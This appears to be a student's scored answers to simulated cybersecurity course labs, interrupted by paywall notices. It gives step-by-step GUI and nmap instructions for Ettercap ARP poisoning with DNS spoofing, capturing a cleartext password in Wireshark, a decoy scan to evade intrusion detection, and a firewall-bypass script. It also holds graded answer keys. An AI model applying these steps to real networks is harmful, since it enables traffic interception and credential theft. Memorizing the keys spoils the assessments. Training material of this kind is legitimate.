You want to spoof the DNS to redirect traffic as part of a man-in-the-
middle attack.
In this lab, your task is to:
•
Use Ettercap to begin sniffing and scanning for hosts.
•
Set Exec (192.168.0.30) as the target machine
•
Initiate DNS spoofing.
•
From Exec, access rmksupplies.com.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 13 seconds
Required Score: 100%
Task Summary
Required Actions
Scan for hosts in Ettercap
Set Exec as the target machine and initate DNS spoofing
Confirm the redirection to Exec
Explanation
In this lab, your task is to:
•
Use Ettercap to begin sniffing and scanning for hosts.
•
Set Exec (192.168.0.30) as the target machine
•
Initiate DNS spoofing.
•
From Exec, access rmksupplies.com.
Complete this lab as follows:
1.
Use Ettercap to begin sniffing and scanning for hosts as follows:
a.
From the Favorites bar, open Ettercap.
b.
Select
Sniff
.
c.
Select
Unified sniffing
.
d.
From the Network Interface drop-down list, select
enp2s0
.
e.
Select
OK
.
f.
Select
Hosts
and select
Scan for hosts
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
2.
Set Exec (192.168.0.30) as the target machine as follows:
a.
Select
Hosts
and select
Host list
.
b.
Under IP Address, select
192.168.0.30
.
c.
Select
Add to Target 1
to assign it as the target.
3.
Initiate DNS spoofing as follows:
a.
Select
Plugins
.
b.
Select
Manage the plugins
.
c.
Select the
Plugins
tab.
d.
Double-click
dns_spoof
to activate it.
e.
Select
Mitm
.
f.
Select
ARP poisoning
.
g.
Select
Sniff remote connections
.
h.
Select
OK
.
4.
From Exec, access rmksupplies.com as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under Executive Office, select
Exec
.
c.
From the task bar, open Chrome.
d.
In the URL field, type
rmksupplies.com
and press
Enter
.
Notice that the page was redirected to RUS Office Supplies despite the web
address not changing.
QUESTION 4:
10.1.11 Filter and Analyze Traffic with Wireshark
You are the IT administrator for a small corporate network. You need
to find specific information about the packets being exchanged on
your network using Wireshark.
In this lab, your task is to:
•
Use Wireshark to capture packets from the enp2s0
interface.
•
Use the following Wireshark filters to isolate and examine
specific types of packets:
o
net 192.168.0.0
o
host 192.168.0.34
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
o
tcp contains password
•
Answer the questions.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 53 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Isolate traffic with the net 192.168.0.0 filter.
Q1
What is the affect of the net 192.168.0.0 filter in Wireshark?
Your answer: Packets with either a source or destination address on the 192.168.0.0 network are
displayed.
Correct answer: Packets with either a source or destination address on the 192.168.0.0 network are
displayed.
Isolate traffic with the host 192.168.0.34 filter.
Q2
What is the affect of the host 192.168.0.34 filter in Wireshark?
Your answer: Packets with 192.168.0.34 in either the source or destination address are displayed.
Correct answer: Packets with 192.168.0.34 in either the source or destination address are displayed.
Isolate traffic with the tcp contains password filter.
Q3
What is the captured password?
Your answer: St@yOut!@
Correct answer: St@y0ut!@
Explanation
In this lab, your task is to:
•
Use Wireshark to capture packets from the enp2s0 interface.
•
Use the following Wireshark filters to isolate and examine specific types of packets:
o
net 192.168.0.0
o
host 192.168.0.34
o
tcp contains password
•
Answer the questions.
Complete this lab as follows:
1.
Begin a Wireshark capture as follows:
a.
From the Favorites bar, open Wireshark.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
b.
Under Capture, select
enp2s0
.
c.
Select the
blue fin
to begin a Wireshark capture.
2.
Apply the net 192.168.0.0 filter as follows:
a.
In the Apply a display filter field, type
net 192.168.0.0
and press
Enter
.
Look at the source and destination addresses of the filtered packets.
b.
In the top right, select
Answer Questions
.
c.
Under Lab Questions, answer question 1.
3.
Apply the host 192.168.0.34 filter as follows:
a.
In the Apply a display filter field, type
host 192.168.0.34
and press
Enter
.
Look at the source and destination addresses of the filtered packets.
b.
Under Lab Questions, answer question 2.
4.
Apply the tcp contains password filter as follows:
a.
In the Apply a display filter field, type
tcp contains password
and
press
Enter
.
b.
Select the
red box
to stop the Wireshark capture.
c.
Locate the
password
in the captured packet.
d.
Under Lab Questions, answer question 3.
e.
Select
Score Lab
.
QUESTION 5:
11.2.10 Perform a Decoy Scan with Zenmap
You work for a penetration testing consulting company. You need to
make sure that you can't be identified by the intrusion detection
systems.
In this lab, your task is to perform a decoy scan on CorpNet.local as
follows:
•
Tools:
Wireshark
and
Zenmap
•
Interface:
enp2s0
•
Random IP addresses:
25
•
IP address:
192.168.0.31
Your Performance
Your Score: 1 of 1 (100%)
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Pass Status:
Pass
Elapsed Time: 1 minute 4 seconds
Required Score: 100%
Task Summary
Required Actions
Perform a decoy scan
Explanation
In this lab, your task is to perform a decoy scan on CorpNet.local as follows:
•
Tools:
Wireshark
and
Zenmap
•
Interface:
enp2s0
•
Random IP addresses:
25
•
IP address:
192.168.0.31
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
In the upper left menu, select the
blue shark fin
to start a scan.
4.
From the Favorites bar, open Zenmap.
5.
In the Command field, type
nmap -D RND:25
.
6.
In the Target field, type
192.168.0.31
.
7.
Select
Scan
.
8.
Maximize the Wireshark window.
9.
In Wireshark, scroll down until you see
192.168.0.31
in the Destination column.
10.
Under Source, view the different IP addresses used to disguise the scan.
QUESTION 6:
11.2.12 Bypass Windows Firewall
You are a cybersecurity specialist. The owner of the CorpNet network
has hired you to perform a penetration test. They are concerned with
the safety of their firewalls. During the reconnaissance phase of your
testing, you discovered a firewall with an IP address of 198.28.2.254.
From outside of the CorpNet network, you decided to scan this firewall
for potential weakness by running an nmap scan.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
In this lab, your task is to run the firewall-bypass nmap script against
the firewall.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 45 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
nmap firewall script ran
Q1
Which vulnerabilities were found on the firewall?
Your answer: FTP
Correct answer: FTP
Explanation
In this lab, your task is to run the firewall-bypass nmap script against the firewall.
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
2.
Type
nmap --script=firewall-bypass 198.28.2.254
and press
Enter
.
3.
In the top right, select
Answer Questions
.
4.
Answer the question.
5.
Select
Score Lab
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help